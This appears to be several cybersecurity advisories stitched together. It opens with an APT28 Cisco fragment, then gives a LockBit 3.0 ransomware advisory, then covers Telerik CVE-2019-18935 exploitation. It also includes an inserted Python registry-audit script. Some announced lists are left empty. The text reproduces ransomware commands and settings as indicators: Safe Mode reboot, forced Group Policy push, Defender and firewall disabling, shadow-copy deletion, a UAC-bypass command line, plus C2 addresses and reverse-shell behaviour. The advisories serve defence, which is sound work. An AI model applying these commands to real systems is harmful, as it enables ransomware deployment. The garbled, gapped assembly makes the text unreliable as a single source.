APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742 (Cisco Bug ID: CSCve54313) as published by Cisco.
TTPs in this advisory may still be used against vulnerable Cisco devices. Organizations are advised to follow the mitigation advice in this advisory to defend against this activity.
UK organizations should report any suspected compromises to the NCSC.
US organisations should contact CISA’s 24/7 Operations Centre at report@cisa.gov or (888) 282-0870.
Mitigation
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model, and LockBit 3.0 is a continuation of previous versions of the ransomware, LockBit 2.0 and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line Parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis, with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable, as the executable’s encrypted portion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
File Sharing Site |
---|
https://www.premiumize[.]com |
https://anonfiles[.]com |
https://www.sendspace[.]com |
https://fex[.]net |
https://transfer[.]sh |
https://send.exploit[.]in |
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts is observed across most intrusions, focusing on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Tool | Description | MITRE ATT&CK ID |
---|---|---|
Chocolatey | Command-line package manager for Windows. | T1072 |
FileZilla | Cross-platform File Transfer Protocol (FTP) application. | T1071.002 |
Impacket | Collection of Python classes for working with network protocols. | S0357 |
MEGA Ltd MegaSync | Cloud-based synchronization tool. | T1567.002 |
Microsoft Sysinternals ProcDump | Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe. | T1003.001 |
Microsoft Sysinternals PsExec | Execute a command-line process on a remote machine. | S0029 |
Mimikatz | Extracts credentials from system. | S0002 |
Ngrok | Legitimate remote-access tool abused to bypass victim network protections. | S0508 |
PuTTY Link (Plink) | Can be used to automate Secure Shell (SSH) actions on Windows. | T1572 |
Rclone | Command-line program to manage cloud storage files. | S1040 |
SoftPerfect Network Scanner | Performs network scans. | T1046 |
Splashtop | Remote-desktop software. | T1021.001 |
WinSCP | SSH File Transfer Protocol client for Windows. | T1048 |
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
LockBit Parameters | Description |
---|---|
-del | Self-delete. |
-gdel | Remove LockBit 3.0 group policy changes. |
-gspd | Spread laterally via group policy. |
-pass (32 character value) | (Required) Password used to launch LockBit 3.0. |
-path (File or path) | Only encrypts provided file or folder. |
-psex | Spread laterally via admin shares. |
-safe | Reboot host into Safe Mode. |
-wall | Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note. |
When executed, LockBit 3.0 will create the mutex, Global, and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via an elevated Component Object Model (COM) interface. C:\Windows\System32\dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC7.
For example, %SYSTEM32%\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
LockBit 3.0 Icon
Registry Key | Value | Data |
---|---|---|
HKCR\. | (Default) | |
HKCR | (Default) | C:\ProgramData |
LockBit 3.0 Wallpaper
Registry Key | Value | Data |
---|---|---|
HKCU\Control Panel\Desktop\WallPaper | (Default) | C:\ProgramData |
Disable Privacy Settings Experience
Registry Key | Value | Data |
---|---|---|
SOFTWARE\Policies\Microsoft\Windows\OOBE | DisablePrivacyExperience | 0 |
Enable Automatic Logon
Registry Key | Value | Data |
---|---|---|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | AutoAdminLogon | 1 |
| DefaultUserName | |
| DefaultDomainName | |
| DefaultPassword | |
Disable and Clear Windows Event Logs
Registry Key | Value | Data |
---|---|---|
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\* | Enabled | 0 |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\*\ChannelAccess | ChannelAccess | AO:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA) |
LockBit 3.0 File Path Locations |
---|
ADMIN$\Temp |
%SystemRoot%\Temp |
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Operating System | Safe Mode with Networking command |
---|---|
Vista and newer | bcdedit /set {current} safeboot network |
Pre-Vista | bootcfg /raw /a /safeboot:network /id 1 |
Operating System | Disable Safe mode reboot |
---|---|
Vista and newer | bcdedit /deletevalue {current} safeboot |
Pre-Vista | bootcfg /raw /fastdetect /id 1 |
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
NetworkShares.xml |
---|
Services.xml stops and disables services on the Active Directory (AD) hosts.
Services.xml |
---|
The following registry configuration changes alter the Group Policy refresh time values, disable SmartScreen, and disable Windows Defender.
Registry Key | Registry Value | Value type | Data |
---|---|---|---|
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTimeDC | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTimeOffsetDC | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTime | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTimeOffset | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | EnableSmartScreen | REG_DWORD | 0 |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System | **del.ShellSmartScreenLevel | REG_SZ | |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender | DisableAntiSpyware | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender | DisableRoutinelyTakingAction | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | DisableRealtimeMonitoring | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | DisableBehaviorMonitoring | REG_DWORD | 1 |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet | SubmitSamplesConsent | REG_DWORD | 2 |
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet | SpynetReporting | REG_DWORD | 0 |
HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile | EnableFirewall | REG_DWORD | 0 |
HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile | EnableFirewall | REG_DWORD | 0 |
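A host whose registry already carries the values in the tables above (together with the event log channel and automatic logon changes listed earlier) is worth treating as tampered with until proven otherwise. The Python script below is an added example and is not part of the advisory or of any tool it mentions: it transcribes each observed key/value/data triple as an indicator and audits a constructed registry snapshot against them. The Winlogon key, which the advisory lists without a hive, is assumed here to sit under HKLM; the `DomainProfile`/`StandardProfile` and `Channels\*` wildcards are expressed as regular expressions.

```python
import re

# Indicators transcribed from the advisory's registry tables.
# Each entry: (key regex, value name, data that matches the observed change, description).
_SYSTEM = r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System$"
_DEFENDER = r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
INDICATORS = [
    (_SYSTEM, "GroupPolicyRefreshTimeDC", "1", "Group Policy refresh interval (DC) forced to 1"),
    (_SYSTEM, "GroupPolicyRefreshTimeOffsetDC", "1", "Group Policy refresh offset (DC) forced to 1"),
    (_SYSTEM, "GroupPolicyRefreshTime", "1", "Group Policy refresh interval forced to 1"),
    (_SYSTEM, "GroupPolicyRefreshTimeOffset", "1", "Group Policy refresh offset forced to 1"),
    (_SYSTEM, "EnableSmartScreen", "0", "SmartScreen disabled"),
    (_DEFENDER + "$", "DisableAntiSpyware", "1", "Windows Defender disabled"),
    (_DEFENDER + "$", "DisableRoutinelyTakingAction", "1", "Defender automatic remediation disabled"),
    (_DEFENDER + r"\\Real-Time Protection$", "DisableRealtimeMonitoring", "1", "real-time monitoring disabled"),
    (_DEFENDER + r"\\Real-Time Protection$", "DisableBehaviorMonitoring", "1", "behavior monitoring disabled"),
    (_DEFENDER + r"\\Spynet$", "SubmitSamplesConsent", "2", "sample submission set to never send"),
    (_DEFENDER + r"\\Spynet$", "SpynetReporting", "0", "cloud reporting turned off"),
    (r"^HKLM\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\(Domain|Standard)Profile$",
     "EnableFirewall", "0", "Windows Firewall profile disabled"),
    # Assumption: the advisory's hive-less Winlogon key is the HKLM one.
    (r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon$",
     "AutoAdminLogon", "1", "automatic logon enabled"),
    (r"^HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\[^\\]+$",
     "Enabled", "0", "event log channel disabled"),
]


def audit_registry(snapshot):
    """Return (key, value name, data, description) for every entry matching an indicator.

    snapshot: {(key path, value name): data}, e.g. built from a .reg export
    or an EDR registry inventory. Data is compared as a string so REG_DWORD
    integers and REG_SZ strings are handled alike.
    """
    findings = []
    for (key, value_name), data in snapshot.items():
        for key_re, ind_value, ind_data, description in INDICATORS:
            if (value_name.lower() == ind_value.lower()
                    and re.match(key_re, key, re.IGNORECASE)
                    and str(data) == ind_data):
                findings.append((key, value_name, str(data), description))
    return findings


# Constructed snapshot for the example (not real host data): a mix of tampered
# values, one firewall profile still enabled, and one untouched log channel.
SAMPLE_SNAPSHOT = {
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System", "GroupPolicyRefreshTime"): 1,
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System", "EnableSmartScreen"): 0,
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware"): 1,
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring"): 1,
    (r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile", "EnableFirewall"): 1,
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "AutoAdminLogon"): "1",
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Security", "Enabled"): 0,
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Application", "Enabled"): 1,
}


if __name__ == "__main__":
    for key, value_name, data, description in audit_registry(SAMPLE_SNAPSHOT):
        print(f"{description}: {key} -> {value_name} = {data}")
```

Because the refresh-time and Defender values are policy keys, a match should be cross-checked against the organization's own Group Policy before it is treated as malicious; the script only reports agreement with the advisory's observed data.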
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
Force GPUpdate PowerShell Command |
---|
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} |
vss | sql | svc$ |
memtas | mepocs | msexchange |
sophos | veeam | backup |
GxVss | GxBlr | GxFWD |
GxCVD | GxCIMgr |
sql | oracle | ocssd |
dbsnmp | synctime | agntsvc |
isqlplussvc | xfssvccon | mydesktopservice |
ocautoupds | encsvc | firefox |
tbirdconfig | mydesktopqos | ocomm |
dbeng50 | sqbcoreservice | excel |
infopath | msaccess | mspu |
onenote | outlook | powerpnt |
steam | thebat | thunderbird |
visio | winword | wordpad |
notepad |
~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.
If configured, LockBit 3.0 will send two HTTP POST requests to one of the C2 servers. Information about the victim host and bot is encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request POST |
Mozilla/5.0 (Windows NT 6.1) |
AppleWebKit/587.38 (KHTML, like Gecko) |
Chrome/91.0.4472.77 |
Safari/537.36 | Edge/91.0.864.37 | Firefox/89.0 |
Gecko/20100101 |
See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Initial Access | ||
---|---|---|
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access. |
Exploit External Remote Services | T1133 | LockBit 3.0 actors exploit RDP to gain access to victim networks. |
Drive-by Compromise | T1189 | LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing. |
Exploit Public-Facing Application | T1190 | LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems. |
Phishing | T1566 | LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks. |
Execution | ||
Technique Title | ID | Use |
Execution | TA0002 | LockBit 3.0 launches commands during its execution. |
Software Deployment Tools | T1072 | LockBit 3.0 uses Chocolatey, a command-line package manager for Windows. |
Persistence | ||
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 uses a compromised user account to maintain persistence on the target network. |
Boot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for persistence. |
Privilege Escalation | ||
Technique Title | ID | Use |
Privilege Escalation | TA0004 | LockBit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient. |
Boot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for privilege escalation. |
Defense Evasion | ||
Technique Title | ID | Use |
Obfuscated Files or Information | T1027 | LockBit 3.0 will send encrypted host and bot information to its C2 servers. |
Indicator Removal: File Deletion | T1070.004 | LockBit 3.0 will delete itself from the disk. |
Execution Guardrails: Environmental Keying | T1480.001 | LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered. |
Credential Access | ||
Technique Title | ID | Use |
OS Credential Dumping: LSASS Memory | T1003.001 | LockBit 3.0 uses Microsoft Sysinternals ProcDump to dump the contents of LSASS.exe. |
Discovery | ||
Technique Title | ID | Use |
Network Service Discovery | T1046 | LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks. |
System Information Discovery | T1082 | LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. |
System Location Discovery: System Language Discovery | T1614.001 | LockBit 3.0 will not infect machines with language settings that match a defined exclusion list. |
Lateral Movement | ||
Technique Title | ID | Use |
Remote Services: Remote Desktop Protocol | T1021.001 | LockBit 3.0 uses Splashtop remote-desktop software to facilitate lateral movement. |
Command and Control | ||
Technique Title | ID | Use |
Application Layer Protocol: File Transfer Protocols | T1071.002 | LockBit 3.0 uses FileZilla for C2. |
Protocol Tunnel | T1572 | LockBit 3.0 uses Plink to automate SSH actions on Windows. |
Exfiltration | ||
Technique Title | ID | Use |
Exfiltration | TA0010 | LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network. |
Exfiltration Over Web Service | T1567 | LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration. |
Impact | ||
Technique Title | ID | Use |
Data Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin. |
Data Encrypted for Impact | T1486 | LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources. |
Service Stop | T1489 | LockBit 3.0 terminates processes and services. |
Inhibit System Recovery | T1490 | LockBit 3.0 deletes volume shadow copies residing on disk. |
Defacement: Internal Defacement | T1491.001 | LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively. |
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be legally shared, including:
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:\Windows\Temp directory. The malicious files were then executed from the C:\Windows\Temp directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:\Windows\Temp directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:\Windows\Temp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files were used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:
.dll extension in the C:\Windows\Temp directory on the server. TA1 may use this capability to hide additional malicious activity on the network.
CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
IP Address | First Identified | Last Identified |
---|---|---|
137.184.130[.]162 | 09/26/2022 | 10/08/2022 |
45.77.212[.]12 | 10/07/2022 | 11/25/2022 |
104.225.129[.]102 | 10/10/2022 | 11/16/2022 |
149.28.85[.]24 | 10/12/2022 | 10/17/2022 |
185.186.245[.]72 | 10/18/2022 | 10/18/2022 |
193.8.172[.]113 | 09/25/2022 | 09/25/2022 |
193.8.172[.]13 | 09/25/2022 | 10/17/2022 |
216.120.201[.]12 | 10/13/2022 | 11/10/2022 |
5.34.178[.]246 | 09/25/2022 | 09/25/2022 |
79.133.124[.]242 | 09/25/2022 | 09/25/2022 |
92.38.169[.]193 | 09/27/2022 | 10/08/2022 |
92.38.176[.]109 | 09/12/2022 | 09/25/2022 |
92.38.176[.]130 | 09/25/2022 | 10/07/2022 |
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:\Windows\Temp directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
IP Address | Resolving Domains |
---|---|
184.168.104[.]171 | xework[.]com xegroups[.]com hivnd[.]com |
144.96.103[.]245 | xework[.]com |
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.
Filename | Description |
---|---|
XEReverseShell.exe | DLL files (masqueraded as PNG files) located in the When executed, the reverse shell utility attempts to connect to Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection. |
Multi-OS_ReverseShell.exe | Reverse shell utility decoded from the base64 encoded file When executed, it will attempt to connect to |
SortVistaCompat | Base64 encoded payload dropped from |
When the TA2 malware is executed, a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com.
If communication is established between the TA2 malware and the C2:
- xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:\Windows\Temp directory.
- xequit, causing the malware to sleep for a period of time determined by the threat actors.
